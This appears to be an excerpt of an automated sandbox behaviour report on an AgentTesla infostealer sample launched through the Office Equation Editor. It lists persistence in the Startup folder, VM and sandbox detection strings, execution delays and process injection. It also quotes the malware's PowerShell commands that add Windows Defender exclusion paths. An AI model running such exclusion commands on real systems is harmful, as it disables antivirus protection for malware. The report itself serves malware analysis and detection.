Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeSection loaded: OutputDebugStringW count: 112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: OutputDebugStringW count: 212
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -180000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2392Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2652Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2372Thread sleep count: 88 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2488Thread sleep count: 85 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_01DB096A GetSystemInfo,5_2_01DB096A
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2119619399.0000000000554000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMwareVBox
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeQueries volume information: C:\Users\user\AppData\Roaming\CTF loader_es.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformationJump to behavior
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe Queries volume information: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match, File source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
